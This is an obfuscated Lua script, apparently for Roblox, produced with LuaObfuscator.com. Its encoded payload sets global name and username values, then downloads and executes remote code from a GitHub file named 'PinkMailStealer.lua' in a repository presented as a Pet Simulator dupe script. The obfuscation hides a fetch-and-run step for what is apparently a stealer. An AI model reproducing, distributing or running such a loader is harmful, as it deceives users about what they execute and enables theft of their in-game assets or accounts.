--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==5) then v16=nil;v16=function(v17,v18,...)local v27=1;local v28;v17=v5(v4(v17,5),"..",function(v29)if (v2(v29,2)==79) then local v81=0;while true do if (v81==0) then v28=v1(v4(v29,1,1));return "";end end else local v82=v3(v1(v29,16));if v28 then local v101=v6(v82,v28);v28=nil;return v101;else return v82;end end end);local function v30(v31,v32,v33)if v33 then local v83=0;local v84;while true do if (v83==((0 + 0) -0)) then v84=(v31/((3 -1)^(v32-(1052 -(309 + 742)))))%((1 + 1)^(((v33-1) -(v32-(1 + 0))) + 1 + 0)) ;return v84-(v84%(2 -1)) ;end end else local v85=1221 -(1082 + 139) ;local v86;while true do if ((0 + 0)==v85) then v86=(2 + 0 + 0)^(v32-(574 -(251 + 311 + 11))) ;return (((v31%(v86 + v86))>=v86) and 1) or 0 ;end end end end local function v34()local v47=0 -0 ;local v48;while true do if (v47==((1797 -(852 + 944)) + 0)) then return v48;end if (0==v47) then v48=v2(v17,v27,v27);v27=v27 + (1 -0) ;v47=1 + 0 ;end end end local function v35()local v49,v50=v2(v17,v27,v27 + 2 );v27=v27 + 1 + 1 ;return (v50 * (670 -(221 + 193))) + v49 ;end local function v36()local v51,v52,v53,v54=v2(v17,v27,v27 + (38 -(20 + 15)) );v27=v27 + 4 ;return (v54 * 16777216) + (v53 * (33568 + 31968)) + (v52 * (428 -172)) + v51 ;end local function v37()local v55=0 + 0 ;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v55==(2 + 1)) then if (v60==(1324 -(770 + (994 -(355 + 85))))) then if (v59==0) then return v61 * (0 -0) ;else local v111=0 -0 ;while true do if (v111==(1009 -(363 + (2059 -1413)))) then v60=1 + 0 ;v58=0 + 0 ;break;end end end elseif (v60==(1077 + 970)) then return ((v59==(261 -(189 + 72))) and (v61 * ((1 + 0)/(0 -0)))) or (v61 * NaN) ;end return v9(v61,v60-1023 ) * (v58 + (v59/(((19 -15) -2)^52))) ;end if (v55==1) then v58=893 -(665 + 227) ;v59=(v30(v57,2 -1 ,48 -28 ) * (2^(23 + 9))) + v56 ;v55=(742 + 606) -(1296 + 50) ;end if ((768 -(281 + 487))==v55) then v56=v36();v57=v36();v55=3 -2 ;end if (v55==2) then v60=v30(v57,(164 -108) -35 ,1589 -(1275 + 283) );v61=((v30(v57,32)==(1 -0)) and  -(1 + (0 -0))) or 1 ;v55=1 + 2 ;end end end local function v38(v39)local v62=1579 -(909 + (1079 -409)) ;local v63;local v64;while true do if (v62==(5 -3)) then v64={};for v102=2 -(1643 -(201 + 1441)) , #v63 do v64[v102]=v3(v2(v4(v63,v102,v102)));end v62=705 -(498 + 79 + 125) ;end if (v62==(1 + 0)) then v63=v4(v17,v27,(v27 + v39) -(1 + 0) );v27=v27 + v39 ;v62=1 + 1 ;end if (v62==(229 -(45 + (434 -253)))) then return v7(v64);end if (v62==(0 + 0)) then v63=nil;if  not v39 then local v104=0 + 0 ;while true do if (v104==(0 + 0)) then v39=v36();if (v39==0) then return "";end break;end end end v62=(1 + 2) -2 ;end end end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v65=0;local v66;local v67;local v68;local v69;local v70;local v71;local v72;while true do if ((3 -2)==v65) then v68=nil;v69=nil;v65=1875 -(1722 + 151) ;end if (v65==(0 + 0)) then v66=0 + 0 ;v67=nil;v65=143 -(84 + 58) ;end if (v65==3) then v72=nil;while true do if (v66==(1911 -(576 + 1334))) then v71=v36();v72={};for v112=1 + 0 ,v71 do local v113=0;local v114;local v115;local v116;local v117;while true do if (v113==(4 -2)) then while true do if (v114~=(1907 -(1815 + 91))) then else v117=nil;while true do if (v115==(442 -(83 + 358))) then if (v116==(465 -(41 + 423))) then v117=v34()~=(0 + 0) ;elseif (v116==2) then v117=v37();elseif (v116==(10 -7)) then v117=v38();end v72[v112]=v117;break;end if (v115==0) then local v141=0;while true do if ((0 -0)==v141) then v116=v34();v117=nil;v141=1;end if (v141==(3 -2)) then v115=4 -3 ;break;end end end end break;end if (v114==(425 -(275 + 150))) then local v129=509 -(429 + 80) ;while true do if (0==v129) then v115=0;v116=nil;v129=1;end if ((1002 -(492 + 509))==v129) then v114=1;break;end end end end break;end if (v113==0) then v114=0 + 0 ;v115=nil;v113=1032 -(734 + 297) ;end if (1==v113) then v116=nil;v117=nil;v113=2;end end end v70[3]=v34();v66=2;end if (v66==2) then local v110=0;while true do if (0==v110) then for v120=1 + 0 ,v36() do local v121=0;local v122;local v123;local v124;while true do if (v121==0) then v122=0;v123=nil;v121=4 -3 ;end if ((1371 -(54 + 1316))~=v121) then else v124=nil;while true do if (v122==(2 -1)) then while true do if (v123~=0) then else v124=v34();if (v30(v124,1514 -(984 + 529) ,1)~=(0 + 0)) then else local v162=0 + 0 ;local v163;local v164;local v165;local v166;local v167;while true do if (v162~=(1161 -(1005 + 156))) then else v163=0;v164=nil;v162=1;end if (v162==2) then v167=nil;while true do if (2~=v163) then else while true do if (v164~=0) then else local v180=158 -(103 + 55) ;while true do if (v180~=1) then else v164=82 -(59 + 22) ;break;end if (v180~=(1531 -(854 + 677))) then else v165=v30(v124,3 -1 ,3);v166=v30(v124,1626 -(697 + 925) ,6);v180=1;end end end if (v164~=(7 -4)) then else if (v30(v166,3,2 + 1 )==(1 + 0)) then v167[12 -8 ]=v72[v167[4]];end v67[v120]=v167;break;end if (v164==2) then local v182=0 -0 ;while true do if (v182~=(0 + 0)) then else local v188=0;local v189;while true do if (v188==0) then v189=0;while true do if (v189==1) then v182=1 + 0 ;break;end if (v189==(414 -(340 + 74))) then if (v30(v166,2 -1 ,1)==1) then v167[5 -3 ]=v72[v167[1832 -(359 + 1471) ]];end if (v30(v166,746 -(46 + 698) ,4 -2 )==(1305 -(1007 + 297))) then v167[3]=v72[v167[1475 -(359 + 1113) ]];end v189=741 -(678 + 62) ;end end break;end end end if (v182==1) then v164=3;break;end end end if (v164~=1) then else local v183=0 -0 ;local v184;local v185;while true do if (v183==(0 + 0)) then v184=0;v185=nil;v183=1799 -(1610 + 188) ;end if (v183~=(654 -(4 + 649))) then else while true do if (v184==(0 -0)) then v185=0;while true do if (v185==1) then v164=1912 -(101 + 1809) ;break;end if (v185==(108 -(38 + 70))) then v167={v35(),v35(),nil,nil};if (v165==(0 -0)) then local v196=729 -(272 + 457) ;local v197;local v198;while true do if ((967 -(526 + 440))~=v196) then else while true do if (v197==(211 -(69 + 142))) then v198=0;while true do if (v198~=0) then else v167[3]=v35();v167[4]=v35();break;end end break;end end break;end if (v196~=0) then else v197=1896 -(1052 + 844) ;v198=nil;v196=1;end end elseif (v165==(2 -1)) then v167[3 + 0 ]=v36();elseif (v165==(2 + 0)) then v167[3]=v36() -(2^(924 -(493 + 415))) ;elseif (v165~=(753 -(476 + 274))) then else local v201=0;local v202;local v203;while true do if (v201==(1 + 0)) then while true do if (v202==(0 -0)) then v203=0;while true do if (v203~=0) then else v167[3]=v36() -((1766 -(1367 + 397))^(13 + 3)) ;v167[5 -1 ]=v35();break;end end break;end end break;end if (v201==0) then v202=0 + 0 ;v203=nil;v201=1 -0 ;end end end v185=2 -1 ;end end break;end end break;end end end end break;end if ((0 -0)==v163) then local v178=0 + 0 ;while true do if (v178==1) then v163=1;break;end if (v178==0) then v164=64 -(4 + 60) ;v165=nil;v178=1 + 0 ;end end end if (1==v163) then local v179=0;while true do if ((1 -0)~=v179) then else v163=1 + 1 ;break;end if (v179~=(1650 -(298 + 1352))) then else v166=nil;v167=nil;v179=1;end end end end break;end if (v162==1) then v165=nil;v166=nil;v162=1004 -(247 + 755) ;end end end break;end end break;end if (v122==0) then local v142=0 -0 ;while true do if (1~=v142) then else v122=2 -1 ;break;end if (v142~=0) then else v123=414 -(324 + 90) ;v124=nil;v142=667 -(631 + 35) ;end end end end break;end end end for v125=1 + 0 ,v36() do v68[v125-1 ]=v42();end v110=1;end if (v110==(1 + 0)) then for v127=1 + 0 ,v36() do v69[v127]=v36();end return v70;end end end if ((0 -0)~=v66) then else v67={};v68={};v69={};v70={v67,v68,nil,v69};v66=1 + 0 ;end end break;end if (v65==(2 + 0)) then v70=nil;v71=nil;v65=1943 -(1083 + 857) ;end end end local function v43(v44,v45,v46)local v73=v44[1];local v74=v44[2];local v75=v44[3];return function(...)local v76=1;local v77= -1;local v78={...};local v79=v13("#",...) -1 ;local function v80()local v87=v73;local v88=v74;local v89=v75;local v90=v41;local v91={};local v92={};local v93={};for v97=0 + 0 + 0 ,v79 do if ((v97>=v89) or ((4941 -(56 + 705))<((1423 + 510) -(201 + 1269)))) then v91[v97-v89 ]=v78[v97 + ((4 -2) -(1 + 0)) ];else v93[v97]=v78[v97 + ((457 -(293 + 161)) -2) ];end end local v94=(v79-v89) + (1459 -((894 -490) + 1054)) ;local v95;local v96;while true do local v98=1066 -(206 + 860) ;local v99;while true do if (((1789 -(112 + 62))>=75) and (v98==(0 + 0))) then v99=0 + 0 ;while true do if ((194==(1012 -((1534 -(140 + 634)) + 58))) and (v99==(0 -0))) then local v118=0 + 0 ;local v119;while true do if ((1010<=(4429 -(1313 + 10))) and (v118==(0 -0))) then v119=1353 -(782 + 571) ;while true do if (((1 + 0)==v119) or ((1358 -659)>=(12524 -8115))) then v99=1;break;end if ((0==v119) or ((141 -111)>=1618)) then local v130=0 -0 ;while true do if (((3585 -(287 + 112))==3186) and (v130==(1 + (0 -0)))) then v119=1620 -(1468 + 151) ;break;end if ((v130==(555 -(43 + (1960 -(517 + 931))))) or ((68 + 864 + 828)<=((2758 -(984 + 53)) -(595 + 56)))) then v95=v87[v76];v96=v95[1];v130=2 -(319 -(159 + 159)) ;end end end end break;end end end if ((v99==(1 + (0 -0))) or (1774<(2191 -(107 + 1875)))) then if (((4030 + (1864 -1319))>(3463 -(310 + 70 + 21))) and (v96<=4)) then if ((891<(5157 -3806)) and (v96<=(2 -1))) then if ((v96==(0 + 0)) or ((4750 -(222 + 382))>(5904 -(817 + (861 -633))))) then local v131=246 -(51 + 195) ;local v132;local v133;local v134;while true do if (((3276 -2336)>=(2616 -(522 + 1225))) and (v131==(1 + 0))) then v134=nil;while true do if ((v132==(0 -0)) or ((4085 -2830)>(256 + 626 + 1342))) then local v168=(1451 + 236) -(1327 + 360) ;while true do if (((0 + 0)==v168) or (((5741 -(475 + 573)) -1429)>=(3148 + 336))) then v133=0;v134=nil;v168=1 + 0 ;end if (((3448 -2119)<=((4298 -(1351 + 148)) + 792)) and (v168==(1 + 0))) then v132=1;break;end end end if ((v132==(1 -0)) or ((4469 -(20 + 113 + 214))<((6492 -4358) -(1573 + 391)))) then while true do if (((415 + 3672)>=(3641 -1947)) and (v133==0)) then v134=v95[2];v93[v134]=v93[v134](v14(v93,v134 + 1 ,v77));break;end end break;end end break;end if ((v131==(0 + 0 + 0)) or ((2244 -((1008 -(340 + 214)) + 138))<(835 + (2321 -1525)))) then v132=0 + 0 ;v133=nil;v131=444 -(77 + 366) ;end end elseif ((4537>(4290 -2968)) and (v93[v95[1463 -(74 + 1387) ]]==v95[4 -0 ])) then v76=v76 + 1 + 0 + 0 ;else v76=v95[5 -2 ];end elseif ((4535>(5346 -2516)) and (v96<=(56 -(38 + 16)))) then v93[v95[2 + 0 + 0 ]][v95[3]]=v95[17 -13 ];elseif ((v96>(3 + 0)) or ((371 + (1830 -(585 + 375)))>=((1010 + 4085) -(732 + 875)))) then local v144=(0 -0) + 0 ;local v145;local v146;local v147;local v148;local v149;while true do if (((686 + (1875 -(523 + 492)))<(1652 + 2019)) and (v144==(423 -(220 + 201)))) then v149=nil;while true do if ((v145==(0 + 0)) or (((5658 -(905 + 147)) -(134 + 1499))<(1541 -(328 + (2416 -1229))))) then v146=v95[2];v147,v148=v90(v93[v146](v14(v93,v146 + (1 -0) ,v95[2 + 1 ])));v145=1 + 0 ;end if (((11532 -7150)>=(4756 -(764 + 799))) and (v145==(1 + 0))) then v77=(v148 + v146) -(1328 -((306 -139) + 1160)) ;v149=0 + 0 ;v145=(510 + 493) -(273 + 728) ;end if (((9114 -6287)==(3001 -(16 + 158))) and (v145==(1 + 1))) then for v174=v146,v77 do local v175=1851 -(698 + 1153) ;local v176;local v177;while true do if (((2359 -851)<(1698 + 304)) and (v175==(1 + 0 + 0))) then while true do if (((5551 -(867 + (1070 -572)))>=(221 + 175)) and (0==v176)) then v177=0 -0 ;while true do if ((v177==(1498 -(1351 + 147))) or (((9484 -6351) + 119)<=(544 -428))) then v149=v149 + (232 -(15 + 102 + 114)) ;v93[v174]=v147[v149];break;end end break;end end break;end if (((4243 -(763 + 423))>(625 + 421 + 834)) and ((0 + 0)==v175)) then v176=719 -(17 + 702) ;v177=nil;v175=1 + 0 ;end end end break;end end break;end if (((1100 -(898 + 202))==v144) or ((2732 -1152)==(7153 -3074))) then v145=659 -(99 + 560) ;v146=nil;v144=1 + 0 ;end if ((4098>=(2356 -(449 + 37 + 52))) and (((5 -2) -2)==v144)) then v147=nil;v148=nil;v144=2;end end else v93[v95[269 -(251 + 16) ]]();end elseif ((v96<=(1693 -(113 + 1573))) or (((3291 -(105 + 1794)) + (2996 -(250 + 98)))<((1329 -(359 + 156)) -(194 + 36)))) then if ((v96<=5) or (((10921 -(590 + 41)) -5862)<(208 + 760 + 428))) then v93[v95[1391 -(1040 + 349) ]]=v95[2 + 1 ];elseif ((v96>(19 -13)) or (744>=(2668 + 1101))) then do return;end else v93[v95[(225 + 549) -(769 + 3) ]]=v46[v95[3 + 0 ]];end elseif ((v96<=(202 -(36 + 158))) or ((2252 + 1321)==(4930 -(539 + 270)))) then v93[v95[1286 -(339 + 752 + 193) ]]=v95[1237 -(689 + (2217 -(1292 + 380))) ]~=0 ;elseif (((4869 -(3700 -(66 + 1111)))>=(2842 -(61 + 737))) and (v96==(11 -2))) then local v152=0 -0 ;local v153;local v154;while true do if ((((1184 + 790) -(115 + 1097))<=(1785 -705)) and (v152==0)) then local v158=0 + 0 ;while true do if ((413==(1065 -(303 + 349))) and (((1 -0) -0)==v158)) then v152=1;break;end if (((0 -0)==v158) or (846<=376)) then v153=v95[4 -2 ];v154=v93[v95[911 -(108 + 800) ]];v158=1 + (1316 -(320 + 996)) ;end end end if ((((664 -164) + 621)>=713) and (v152==(819 -((854 -433) + 397)))) then v93[v153 + 1 + 0 ]=v154;v93[v153]=v154[v95[10 -6 ]];break;end end else v76=v95[10 -7 ];end v76=v76 + ((2037 -1347) -(226 + 463)) ;break;end end break;end end end end A,B=v41(v12(v80));if  not A[1] then local v100=v44[4][v76] or "?" ;error("Script error at ["   .. v100   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end return v43(v42(),{},v18)(...);end;v16("LOL!0A3O00028O0003023O005F4703043O004E616D65030D3O003231466C61775468654B692O6C03083O00557365726E616D65026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403593O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4F6C69776965724973547279486172642F447570655363726970745053582F6D61696E2F50696E6B4D61696C537465616C65722E6C756100153O0012053O00013O0026013O00080001000100040A3O00080001001206000100023O003002000100030004001206000100023O0030020001000500040012053O00063O0026013O00010001000600040A3O00010001001206000100073O001206000200083O0020090002000200090012050004000A4O0008000500014O0004000200056O00013O00022O000300010001000100040A3O0014000100040A3O000100012O00073O00017O00153O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (4==v0) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end end end
